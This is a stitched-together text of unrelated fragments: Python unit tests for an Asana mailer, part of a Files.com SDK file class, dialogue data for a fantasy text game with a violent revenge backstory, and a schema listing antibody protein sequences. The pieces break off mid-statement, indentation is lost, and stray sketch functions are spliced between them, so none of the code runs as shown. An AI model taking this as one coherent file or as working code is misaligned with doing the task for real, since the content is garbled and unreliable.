self.assertEqual(asana_mailer.most_recent_comments([], 5), [])
self.assertEqual(asana_mailer.most_recent_comments([], 1), [])
def test_comments_within_lookback(self):
now = datetime.datetime.now(dateutil.tz.tzutc())
comments = [
{u'created_at': (now - datetime.timedelta(days=i)).isoformat()}
for i in reversed(xrange(7))
]
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 0),
comments[-1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 24),
comments[-1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 25),
comments[-2:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 49),
comments[-3:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 144),
comments[1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 200),
comments)
self.assertEqual(
asana_mailer.comments_within_lookback([], now, 200), [])
def test_as_date(self):
now = datetime.datetime.now()
now_str = now.isoformat()
now_date_str = now.date().isoformat()
self.assertEqual(asana_mailer.as_date('garbage'), 'garbage')
self.assertEqual(asana_mailer.as_date(now_str), now_date_str)
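# Illustrative sketches (not the actual asana_mailer implementations) of
# the filter semantics exercised above: last_comment keeps at most the
# final comment, and most_recent_comments keeps the trailing `num`
# comments but never fewer than one when any exist.
def _sketch_last_comment(comments):
    return comments[-1:] if comments else []

def _sketch_most_recent_comments(comments, num):
    return comments[-max(num, 1):] if comments else []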
class TaskTestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
now = datetime.datetime.now(dateutil.tz.tzutc())
name = 'Test'
assignee = 'TestUser'
completed = True
completion_time = now
description = 'A test!'
due_date = now.date().isoformat()
tags = ['test1', 'test2']
comments = []
cls.task = asana_mailer.Task(
name, assignee, completed, completion_time, description, due_date,
tags, comments)
def test_init(self):
original = type(self).task
task = asana_mailer.Task(
original.name, original.assignee,
original.completed, original.completion_time,
original.description, original.due_date,
original.tags, original.comments)
self.assertEqual(task.name, original.name)
self.assertEqual(task.assignee, original.assignee)
self.assertEqual(task.completed, original.completed)
self.assertEqual(task.completion_time, original.completion_time)
self.assertEqual(task.description, original.description)
self.assertEqual(task.due_date, original.due_date)
self.assertEqual(task.tags, original.tags)
self.assertEqual(task.comments, original.comments)
def test_tags_in(self):
filter_set = set()
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1'}
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1', 'test2'}
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1', 'test2', 'test3'}
self.assertEqual(type(self).task.tags_in(filter_set), False)
class AsanaMailerTestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
cls.current_date = datetime.date.today()
@classmethod
def teardown_class(cls):
for fname in glob.glob('AsanaMailer_*.*'):
if os.path.exists(fname):
os.remove(fname)
@mock.patch('premailer.transform')
@mock.patch('asana_mailer.FileSystemLoader')
@mock.patch('asana_mailer.Environment')
def test_generate_templates(
self, mock_jinja_env, mock_fs_loader, mock_transform):
mock_fs_instance = mock_fs_loader.return_value
mock_env_instance = mock_jinja_env.return_value
mock_get_template = mock_env_instance.get_template.return_value
mock_get_template.render.return_value = 'template render'
mock_transform.return_value = 'premailer transform'
project = mock.MagicMock()
return_vals = asana_mailer.generate_templates(
project, 'html_template', 'text_template', type(self).current_date,
type(self).current_time_utc)
mock_jinja_env.assert_called_once_with(
loader=mock_fs_instance, trim_blocks=True, lstrip_blocks=True,
autoescape=True)
mock_env_instance.get_template.assert_has_calls(
[mock.call('html_template'), mock.call('text_template')],
any_order=True)
mock_fs_loader.assert_called_once_with('templates')
self.assertFalse(mock_env_instance.autoescape)
self.assertEquals(
('premailer transform', 'template render'),
# File: files_sdk/models/file.py
import builtins
import datetime
from builtins import open as builtin_open
from datetime import datetime
import json
import io
from pathlib import Path
from . import file_action
from files_sdk.models.file_action import FileAction
from files_sdk.models.file_upload_part import FileUploadPart
from files_sdk.api import Api
from files_sdk.exceptions import InvalidParameterError, MissingParameterError, NotImplementedError
class File:
default_attributes = {
'path': None, # string - File/Folder path This must be slash-delimited, but it must neither start nor end with a slash. Maximum of 5000 characters.
'display_name': None, # string - File/Folder display name
'type': None, # string - Type: `directory` or `file`.
'size': None, # int64 - File/Folder size
'mtime': None, # date-time - File last modified date/time, according to the server. This is the timestamp of the last Files.com operation of the file, regardless of what modified timestamp was sent.
'provided_mtime': None, # date-time - File last modified date/time, according to the client who set it. Files.com allows desktop, FTP, SFTP, and WebDAV clients to set modified at times. This allows Desktop<->Cloud syncing to preserve modified at times.
'crc32': None, # string - File CRC32 checksum. This is sometimes delayed, so if you get a blank response, wait and try again.
'md5': None, # string - File MD5 checksum. This is sometimes delayed, so if you get a blank response, wait and try again.
'mime_type': None, # string - MIME Type. This is determined by the filename extension and is not stored separately internally.
'region': None, # string - Region location
'permissions': None, # string - A short string representing the current user's permissions. Can be `r`,`w`,`p`, or any combination
'subfolders_locked?': None, # boolean - Are subfolders locked and unable to be modified?
'download_uri': None, # string - Link to download file. Provided only in response to a download request.
'priority_color': None, # string - Bookmark/priority color of file/folder
'preview_id': None, # int64 - File preview ID
'preview': None, # File preview
'action': None, # string - The action to perform. Can be `append`, `attachment`, `end`, `upload`, `put`, or may not exist
'length': None, # int64 - Length of file.
'mkdir_parents': None, # boolean - Create parent directories if they do not exist?
'part': None, # int64 - Part if uploading a part.
'parts': None, # int64 - How many parts to fetch?
'ref': None, # string -
'restart': None, # int64 - File byte offset to restart from.
'structure': None, # string - If copying folder, copy just the structure?
'with_rename': None, # boolean - Allow file rename instead of overwrite?
}
def __init__(self, *args):
self.set_attributes({})
self.options = {}
self.mode = 'r'
self.upload = None
self.etags = None
self.io_obj = io.StringIO()
self.closed = True
self.bytes_written = 0
if len(args) >= 1:
if isinstance(args[0], dict):
self.set_attributes(args[0])
elif isinstance(args[0], str):
self.set_attributes({"path": args[0]})
if len(args) >= 2:
if isinstance(args[1], dict):
self.options = args[1]
elif isinstance(args[1], str):
self.mode = args[1]
if len(args) >= 3:
if isinstance(args[2], dict):
self.options = args[2]
def set_attributes(self, attributes):
for (attribute, default_value) in File.default_attributes.items():
setattr(self, attribute, attributes.get(attribute, default_value))
def get_attributes(self):
return {k: getattr(self, k, None) for k in File.default_attributes if getattr(self, k, None) is not None}
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __del__(self):
if not self.io_obj.closed:
self.io_obj.close()
def close(self):
self.flush()
if self.upload:
end_options = {
"action": "end",
"etags": self.etags,
"provided_mtime": datetime.now().isoformat(),
"ref": self.upload.ref,
"size": self.bytes_written
}
file = create(self.path, end_options, self.options)
self.set_attributes(file.get_attributes())
self.mode = 'r'
self.upload = None
self.etags = None
self.io_obj = io.StringIO()
self.io_obj.close()
self.closed = True
def fileno(self):
raise OSError
def flush(self, *_args):
if "w" in self.mode:
if self.io_obj.seekable():
self.io_obj.seek(0)
self.upload, self.etags, bytes_written = upload_chunks(self.io_obj, self.path, self.options, self.upload, self.etags)
self.bytes_written += bytes_written
elif "a" in self.mode:
raise io.UnsupportedOperation("Append is not a supported mode")
def isatty(self):
return False
def read(self):
if self.readable():
self.download_content(self.io_obj, "b" not in self.mode)
self.io_obj.seek(0)
return self.io_obj.read()
else:
raise OSError("read mode not indicated")
def readable(self):
if 'r' in self.mode and not self.closed:
return True
return False
def readall(self):
return self.read()
def readinto(self):
raise NotImplementedError
def readline(self):
raise NotImplementedError
def seek(self):
raise OSError
def seekable(self):
return False
def tell(self):
raise OSError
def truncate(self):
raise OSError
def writeable(self):
if "w" in self.mode and not self.closed:
return True
return False
def write(self, *args):
if self.writeable():
self.io_obj.write(*args)
else:
raise OSError("write mode not indicated")
def download_uri_with_load(self):
if self.download_uri:
return self.download_uri
f = download(self.path, {}, self.options)
self.set_attributes(f.get_attributes())
return self.download_uri
def download_content(self, io, is_string_io = False):
Api.api_client().stream_download(self.download_uri_with_load(), io, is_string_io)
def download_file(self, output_file):
with builtin_open(output_file, 'wb') as file:
self.download_content(file)
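    # Illustrative usage sketch (hypothetical path; assumes the SDK session
    # is configured and that the SDK exposes an open helper -- name assumed
    # -- which returns a handle marked not-closed). Reads stream the remote
    # content into io_obj; writes are buffered and uploaded in chunks when
    # flush()/close() runs:
    #
    #     with files_sdk.open('remote/report.txt', 'r') as f:
    #         text = f.read()
    #     with files_sdk.open('remote/report.txt', 'w') as f:
    #         f.write('hello world')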
# Download file
#
# Parameters:
# action - string - Can be blank, `redirect` or `stat`. If set to `stat`, we will return file information but without a download URL, and without logging a download. If set to `redirect` we will serve a 302 redirect directly to the file. This is used for integrations with Zapier, and is not recommended for most integrations.
# preview_size - string - Request a preview size. Can be `small` (default), `large`, `xlarge`, or `pdf`.
# with_previews - boolean - Include file preview information?
# with_priority_color - boolean - Include file priority color information?
def download(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "action" in params and not isinstance(params["action"], str):
raise InvalidParameterError("Bad parameter: action must be an str")
if "preview_size" in params and not isinstance(params["preview_size"], str):
raise InvalidParameterError("Bad parameter: preview_size must be an str")
response, _options = Api.send_request("GET", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
# Parameters:
# provided_mtime - string - Modified time of file.
# priority_color - string - Priority/Bookmark color of file.
def update(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "provided_mtime" in params and not isinstance(params["provided_mtime"], str):
raise InvalidParameterError("Bad parameter: provided_mtime must be an str")
if "priority_color" in params and not isinstance(params["priority_color"], str):
raise InvalidParameterError("Bad parameter: priority_color must be an str")
response, _options = Api.send_request("PATCH", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
# Parameters:
# recursive - boolean - If true, will recursively delete folders. Otherwise, will error on non-empty folders.
def delete(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
response, _options = Api.send_request("DELETE", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
def destroy(self, params = None):
self.delete(params)
# Copy file/folder
#
# Parameters:
# destination (required) - string - Copy destination path.
# structure - boolean - Copy structure only?
def copy(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "destination" not in params:
raise MissingParameterError("Parameter missing: destination")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "destination" in params and not isinstance(params["destination"], str):
raise InvalidParameterError("Bad parameter: destination must be an str")
response, _options = Api.send_request("POST", "/file_actions/copy/{path}".format(path=params['path']), params, self.options)
return response.data
# Move file/folder
#
# Parameters:
# destination (required) - string - Move destination path.
def move(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
| |
"""
Dialogue text with player responses.
- necromancer
- rat
"""
from engine.initiate import player_name
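# Illustrative sketch (not part of engine.initiate): each node below maps
# an id to {"text": ..., "options": [(player_reply, next_node_id), ...]};
# a dialogue plays by printing the node text, offering the replies, and
# jumping to the chosen reply's node id until a node has no options.
def run_dialogue(tree, node_id=1):
    while node_id in tree:
        node = tree[node_id]
        print(node["text"])
        if not node["options"]:
            break
        for i, (reply, _) in enumerate(node["options"], 1):
            print(f"{i}) {reply}")
        choice = int(input("> ")) - 1
        node_id = node["options"][choice][1]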
# 80 characters for reference:
#------------------------------------------------------------------------------#
necromancer_dialogue = {
1: {
"text":
"""I have to say, I am impressed. I sensed you intruding my lair and you managed
to pass through my traps and creatures up until now. Now tell me, do you wish
to die here or do you wish to be the test subject for my new experiment? It will
be painful either way!""",
"options": [
(f"My name is {player_name}. I've heard of your exploits against the people of\n\
Stennerden and I've come to bring justice. Duel me, necromancer!", 2),
("I don't care for chat, I will be the last thing you will ever see! (fight)", 21)
]
},
2: {
"text":
"""HAH! A peasant human with your little toy against ME, a mage with years of
conjuration practice and whose life is devoted entirely towards the dark arts?!
I mirth at your feebleness!""",
"options": [
################################################################################...
("Do not underestimate me, mage. I've passed all your traps and destroyed all your\n\
monsters, and come out a better warrior than I ever was! Now, will you duel\n\
me?", 3),
("Who you are does not scare me at all. I've come for one thing and one thing\n\
only: your head! (fight)", 21)
]
},
3: {
"text":
"""How very brave. I have met some of you. Though none have lived to tell the tale
of winning a duel with a necromancer. But before I end your life, I will tell
you this: Do you really know why you are here? Randolf only told you what you
needed to know.""",
"options": [
################################################################################...
("You're really tempting me here, mage... but of course. My job here is simple.\n\
You harass the innocent townspeople and I'm here to stop you. For good.", 4),
("I trust Randolf and his word. I have no quarrel with him either and a fat sum of\n\
aurels is waiting for me back in Stennerden in exchange for your head. What\n\
do you have in mind?", 5),
("I don't stay and chat with the likes of you. Your time ends here! (fight)", 21)
]
},
4: {
"text":
'''I am not surprised by your words. Those "innocent" townspeople have caused me
nothing but agony and humiliation. They were all his believers. It was not
enough either that I had my home scorched up in flames and was sent to a
pillory. And I told them that Randolf is a cruel and corrupt man, that the
blood was falsely placed on my hands, but to no avail.''',
"options": [
("What do you mean?", 6),
("A change of mind, I don't care to hear a word more. Die! (fight)", 21)
]
},
5: {
"text":
'''I am not surprised by your words. Randolf is a manipulative liar and should be
sentenced to the gallows for what he has done to me and to his fellow
townspeople. But they were all his believers. It was not enough either that I
had my home scorched up in flames and was sent to a pillory. And I told them
that Randolf is a cruel and corrupt man, that the blood was falsely placed on
my hands, but to no avail.''',
"options": [
("What do you mean?", 6),
("A change of mind, I don't care to hear a word more. Die! (fight)", 21),
]
},
6: {
"text":
"""As I have said previously, Randolf always gets his way out with bribery and
coercion. At least once a week he would set off in the evening with some young
maiden from the village and take her to his manor. And often those maidens were
unwilling as they loved their husbands. But you already know in his nature, he
still managed to submit them to his henious desires, through ways I do not wish
to imagine... But it was until one evening that-""",
"options": [
("*let him continue*", 7),
("Stop, I don't believe any of this. You're trying to get me to side with you.", 20),
("You know what, I have no more time for this. Taste my steel! (fight)", 21),
]
},
7: { # Point of no return, you may only listen to his backstory from now on haha.
"text":
"""-I came home to the sound of struggle and yelping. The front door was locked
so I ran up from the back and to my eyes I saw my poor wife, my beautiful
darling, being mishandled by that pot-bellied, dog-headed whoreson they call the
town bailiff. I yelled her name. I lunged at the bastard and we fought for a bit
until at one moment got the best of me and pulled a dagger to my wife's throat,
claiming he would kill her if I got any closer.""",
"options": [
("...", 8)
]
},
8: {
"text":
"""It was at this point I had to recollect my wits before I could do any sudden
moves. Then there was a knock on the front door. It threw him off guard,
giving her a chance to free herself and me a chance to intervene. She squared
him in the nose, but his stagger dodged my lunge, and by then the dagger was
already in her gut.""",
"options": [
("...", 9)
]
},
9: {
"text":
"""I grabbed a candlestick from the table and whacked him across his fat skull. And
in a fit of rage, I took the knife from his loosened clasp and proceeded to
repeatedly insert it back and forth across his abdomen all while he screeched
for help. It was most unfortunate that two guards happened to come by through
the back door at this state. They saw the blade buried underneath him and a dead
woman laying beside me.""",
"options": [
("...", 10)
]
},
10: {
"text":
"""They took me in for the town's jail, scheduled for the pillory on the morrow,
and the gallows over the next. The bailiff narrowly avoided bleeding out by
hasty action from the town's surgeon, and in hindsight, I should have went for
the throat. But as for her... the Gods could not save her. No form or amount of
explanation overrode his authority as he told them I was strangling my own wife
and that he had come in upon hearing the noises to stop me, only to be
attacked and stabbed.""",
"options": [
("...", 11)
]
},
11: {
"text":
"""Pillory day. A God-awful entire day as hurls of rotten vittles, insults, and
whatever filth they brought in rained upon what was left of my dignity. Back in
the cell I was, and they only fed me whatever scraps were left from the
platform I was on. The last day came and I was only a few hours away from having
my neck hanged up from the gallows. But then I heard this mysterious voice in my
head, telling me how he had a plan for me and that I could still save her.""",
"options": [
("...", 12)
]
},
12: {
"text":
"""She... she was my sole reason to be, and without her the ounce of light I had
left in me had been taken. I chanced upon the offer and it was by some divine
intervention that I was given the fortitude and willpower to strangle the guard
from inside of the cell, unlocked it with his keys, and sneaked out. It was only
a matter of time before others would find out, and I raced to the graveyard and
found her lifeless, cold body still on a cart waiting to be buried.""",
"options": [
("...", 13)
]
},
13: {
"text":
"""I stole her away and escaped into the northern woods. Since then the intrusion
in my head would lead me to things I never would have imagined. I delved into
the mystic arts, into necromancy, still trying to preserve her beautiful body.
For years and years, I studied immensely, still following the voice. But I had
one other thing in mind the whole time. Randolf. And I am so very close to
perfecting my plan in having revenge. And then you | |
# YKTTPPVLDSDGSFFLYSKLTVDKSRWQQGNVFSCSVMHEALHNHYTQKSLSLSPGK' , 'MALW
# TRLRPLLALLALWPPPPARAFVNQHLCGSHLVEALYLVCGERGFFYTPKARREVEGPQVGALELAG
# GPGAGGLEGPPQKRGIVEQCCASVCSLYQLENYCN' , 'EEQVVESGGGFVQPGGSLRLSCAASG
# FTFSPYWMHWVRQAPGKGLVWVSRINSDGSTYYADSVKGRFTISRDNARNTLYLQMNSLRAEDTAV
# YYCARDRYYGPEMWGQGTMVTVSSGSASAPTLFPLVSCENSPSDTSSVAVGCLAQDFLPDSITFSW
# KYKNNSDISSTRGFPSVLRGGKYAATSQVLLPSKDVMQGTDEHVVCKVQHPNGNKEKNVPLPVIAE
# LPPKVSVFVPPRDGFFGNPRKSKLICQATGFSPRQIQVSWLREGKQVGSGVTTDQVQAEAKESGPT
# TYKVTSTLTIKESDWLSQSMFTCRVDHRGLTFQQNASSMCVPDQDTAIRVFAIPPSFASIFLTKST
# KLTCLVTDLTTYDSVTISWTRQNGEAVKTHTNISESHPNATFSAVGEASICEDDWNSGERFTCTVT
# HTDLPSPLKQTISRPKGVALHRPDVYLLPPAREQLNLRESATITCLVTGFSPADVFVQWMQRGQPL
# SPEKYVTSAPMPEPQAPGRYFAHSILTVSEEEWNTGETYTCVVAHEALPNRVTERTVDKSTGKPTL
# YNVSLVMSDTAGTCY' , 'EVKLLESGGGLVQPGGSMRLSCAGSGFTFTDFYMNWIRQPAGKAPE
# WLGFIRDKAKGYTTEYNPSVKGRFTISRDNTQNMLYLQMNTLRAEDTATYYCAREGHTAAPFDYWG
# QGTLVTVSSASTTAPSVFPLAPSCGSTSGSTVALACLVSGYFPEPVTVSWNSGSLTSGVHTFPSVL
# QSSGLYSLSSMVTVPSSRWPSETFTCNVAHPASKTKVDKPVPKRENGRVPRPPDCPKCPAPEMLGG
# PSVFIFPPKPKDTLLIARTPEVTCVVVDLDPEDPEVQISWFVDGKQMQTAKTQPREEQFNGTYRVV
# SVLPIGHQDWLKGKQFTCKVNNKALPSPIERTISKARGQAHQPSVYVLPPSREELSKNTVSLTCLI
# KDFFPPDIDVEWQSNGQQEPESKYRTTPPQLDEDGSYFLYSKLSVDKSRWQRGDTFICAVMHEALH
# NHYTQKSLSHSPGK' , 'QVQLVQSGAEVKKPGASVKVSCKASGYTFTNSWIGWFRQAPGQGLEW
# IGDIYPGGGYTNYNEIFKGKATMTADTSTNTAYMELSSLRSEDTAVYYCSRGIPGYAMDYWGQGTL
# VTVSSASTKGPSVFPLAPSSKSTSGGTAALGCLVKDYFPEPVTVSWNSGALTSGVHTFPAVLQSSG
# LYSLSSVVTVPSSSLGTQTYICNVNHKPSNTKVDKKVEPKSCDKTHTCPPCPAPELLGGPSVFLFP
# PKPKDTLMISRTPEVTCVVVDVSHEDPEVKFNWYVDGVEVHNAKTKPREEQYNSTYRVVSVLTVLH
# QDWLNGKEYKCKVSNKALPAPIEKTISKAKGQPREPQVYTLPPSRDELTKNQVSLTCLVKGFYPSD
# IAVEWESNGQPENNYKTTPPVLDSDGSFFLYSKLTVDKSRWQQGNVFSCSVMHEALHNHYTQKSLS
# LSPGK' , 'DKTHTCPPCPAPEAAGGPSVFLFPPKPKDTLMISRTPEVTCVVVDVSHEDPEVKFN
# WYVDGVEVHNAKTKPREEQYNSTYRVVSVLTVLHQDWLNGKEYKCKVSNKALPAPIEKTISKAKGQ
# PREPQVYTLPPSREEMTKNQVSLSCAVKGFYPSDIAVEWESNGQPENNYKTTPPVLDSDGSFFLVS
# KLTVDKSRWQQGNVFSCSVMHEALHNRYTQKSLSLSPG'
'tax_id': 'NUMERIC',
# EXAMPLES:
# '9913' , '9913' , '9606' , '9606' , '9606' , '9606' , '9913' , '96
# 06' , '9606' , '9606'
}
},
'description': 'TEXT',
# EXAMPLES:
# 'ONCOLYSIN M (Immunotoxin mab)' , 'J591 (111In) (mab)' , 'Vapaliximab (chi
# meric mab)' , 'Prompt bovine insulin zinc suspension' , 'REGN-846 (mab)' ,
# 'ALG-991 (chimeric mab)' , 'Nacolomab tafenatox (mouse Fab)' , 'Felvizuma
# b (humanized mab)' , 'MEDI-500 (mouse mab)' , 'SAR-1349 (mab)'
'helm_notation': 'TEXT',
# EXAMPLES:
# 'PEPTIDE1{D.I.Q.M.T.Q.R.P.D.S.L.S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.
# G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.
# G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.
# G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.
# N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.
# L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.
# G.E.C}|PEPTIDE2{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.S.V.K.V.S.C.K.A.S.G.Y.T.F.
# T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.T.N.Y.N.E.I.F.K.G.
# K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.S.R.G.I.P.G.Y.
# A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.
# A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.
# S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.
# K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.
# L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.
# K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.
# N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.
# Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.
# D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.
# Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.S.V.K.V.
# S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.
# T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.
# Y.C.S.R.G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.
# S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.
# H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.
# K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.
# L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.
# V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.
# G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.
# P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.
# N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.
# V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.M.T.Q.R.P.D.S.L.
# S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.
# P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.
# P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.
# I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.
# V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,140:R3-
# 200:R3|PEPTIDE3,PEPTIDE3,145:R3-201:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTI
# DE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE2,262:R3-322:R3|PEPTIDE4,PEPTID
# E4,140:R3-200:R3|PEPTIDE3,PEPTIDE4,221:R3-220:R3|PEPTIDE4,PEPTIDE4,23:R3-9
# 4:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE3,227:R3-227:R3|PEPTIDE
# 3,PEPTIDE3,262:R3-322:R3|PEPTIDE2,PEPTIDE1,221:R3-220:R3|PEPTIDE2,PEPTIDE2
# ,145:R3-201:R3|PEPTIDE1,PEPTIDE1,23:R3-94:R3|PEPTIDE2,PEPTIDE2,368:R3-426:
# R3|PEPTIDE3,PEPTIDE3,368:R3-426:R3$$$' , 'PEPTIDE1{Q.S.V.L.T.Q.P.P.S.A.S.G
# .T.P.G.Q.R.V.T.I.S.C.S.G.S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I
# .Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D
# .Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P
# .P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K
# .A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C
# .Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|PEPTIDE2{E.V.Q.L.L.E.S.G.G.G.L.V.Q
# .P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.S
# .I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R
# .A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T
